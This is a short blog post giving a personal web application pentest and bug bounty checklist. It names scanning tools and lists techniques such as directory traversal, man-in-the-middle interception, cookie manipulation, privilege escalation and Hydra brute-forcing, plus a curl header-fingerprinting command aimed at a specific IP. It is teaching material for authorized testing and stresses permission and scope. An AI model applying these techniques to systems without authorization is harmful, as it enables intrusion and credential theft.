Web Application Pentest/ Bug Bounty Checklist & Methodology

OK, so you want to start pentesting websites or doing bug bounties against web applications, but where do you start? This is the perfect blog just for you!

Please Keep In Mind

Before we go guns blazing into what a methodology of a pentest is and some of the tools you can use are, it's important to understand the legality behind what you're about to perform. Without explicit approval from the owner of that website or the website/ business you're about to do scans on being listed under one of the various bug bounty platforms (worth reading about scopes), you should absolutely not run any scans on their web application. I have to write this in here to cover myself unfortunately, just in case there's a sticky situation where someone says "DC SAID I COULD DO IT AND THAT MAKES IT LEGAL!"

Don't do it without authorization - it's that simple.

OK, lets get onto the fun stuff!

Operating System

Any operating system will do, honestly, but in my example I used WSL2 Ubuntu on a Windows 11 system. Is it perfect? No. Does it work? Yep! I'd recommend using something purpose driven though, like Kali Linux or Parrot or even Black Arch, for those of you who use arch btw.

Weirdly, running neofetch show's that I'm using windows 10, but I assure you, it's actually Windows 11.

Tools

Nikto

WPScan

Nuclei

WAPITI3

Methodology & Checklist

Below are some checklist items I make sure to mark off when completing a web app pentest or undertaking any bug bounties. Keep in mind the tools to be used for each service really depend one the services you're pentesting against, as well as what's in scope (always stay in scope ladies and gents!).

• [ ] Conduct search engine exploration for leakage of information

• [ ] Retrieve and evaluate files on robot.txt

• [ ] Review content of web page

• [ ] Assess the software edition, database information, the technical error part, coding errors when requesting invalid pages.

• [ ] Examine the configuration of network infrastructure

• [ ] Analyze the sources code from the front end of the application accessing pages

• [ ] Test retention of sensitive information by file extensions

• [ ] Check CAPTCHA for presenting or not presenting authentication vulnerabilities.

• [ ] Cloud storage test

• [ ] Testing the manipulation of roles and privileges to access resources

• [ ] Check cryptography and error handling

• [ ] Test by checking Encryption for Exposed Session variables

• [ ] Data validation testing

• [ ] Conduct a Directory Traversal Attack to access and execute Restricted Directories commands from outside the root directories of the Web server

• [ ] Use vulnerability scanning software such as HP web inspect, Evolve conduct vulnerability scanning to identify the network vulnerability and decide whether it is possible to exploit the device.

• [ ] Conducting a MITM (Man-in-the-middle) attack by blocking communications between end-users and web servers to access confidential information.

• What are the WHOIS details?

• What are the subdomains?

• What CMS/ Web Servers/ Analytics Engines/ Programming Languages/ JavaScript Libraries/ SEO tools/ Other Plugins are in use on this domain?

• What are the hosting details of this domain?

• Does this site have any additional plugins installed? $ curl -s -D – http://167.71.67.124/ -o /dev/null | grep -i “Server\|X-Powered-By”

• What is the DNS infrastructure (DNS records)? https://mxtoolbox.com/DNSLookup.aspx

• What ports are open on this domain? https://pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap https://www.yougetsignal.com/tools/open-ports/

• List any cleartext passwords visible https://www.researchgate.net/figure/Wireshark-Filtering-Showing-Clear-Text-of-user-Name-and-Password_fig3_326419957 https://www.infosecmatter.com/capture-passwords-using-wireshark/

• Check for application logic flaws https://portswigger.net/web-security/logic-flaws https://www.yuninfosec.com/exploit-subverting-application-logic-with-burpsuite/

• Check for forced browsing https://portswigger.net/support/using-burp-to-test-for-missing-function-level-access-control

• Check access and authentication controls https://portswigger.net/support/using-burp-to-test-access-controls

• Check session management https://portswigger.net/support/using-burp-to-attack-session-management

• Check for cookie manipulation https://portswigger.net/support/using-burp-to-hack-cookies-and-manipulate-sessions

• Check for horizontal escalation https://blog.yeswehack.com/yeswerhackers/pimpmyburp-auth-analyzer-test-horizontal-vertical-privileges-escalation/

• Check for vertical escalation https://blog.yeswehack.com/yeswerhackers/pimpmyburp-auth-analyzer-test-horizontal-vertical-privileges-escalation/

• Check for brute-force password guessing https://sectools.org/tool/hydra/

• Check for poor server configuration

Wrap-Up

So to wrap this little post up nicely, these tools, methodologies and technologies being used are mostly personal preference. I don't pretend to know everything, this is just how I do things, and I'm 99% sure there's better ways that suit your situations better that can be utilised, so say what I say here with a grain of salt and learn to hack all the things your way!